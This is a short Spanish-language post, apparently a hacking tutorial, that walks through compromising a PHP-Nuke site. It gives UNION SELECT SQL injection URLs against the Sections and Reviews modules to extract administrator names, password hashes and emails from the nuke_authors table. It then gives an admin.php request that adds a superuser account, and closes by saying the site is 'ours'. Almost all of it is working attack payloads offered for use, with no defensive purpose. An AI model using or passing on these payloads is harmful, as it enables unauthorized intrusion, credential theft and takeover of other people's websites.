En primer lugar, se puede obtener una sentencia SQL con el password del administrador principal del sitio web con esta orden:

/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_a uthors

Tambien se pueden sacar más datos asi:

/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,p wd,url,url,10000,name%20FROM%20nuke_authors/*

Una vez obtenida la password del usuario ROOT, podemos crearnos una cuenta de superusuario:

/admin.php?op=AddAuthor&add_radminsuper=1&add_name= TLTLTL&add_aid=TLTLTL&add_
[email protected]&add_pwd=12345&admin=

Una vez tenemos una cuenta con dichos privilegios, el site es nuestro y podemos hacer lo que queramos.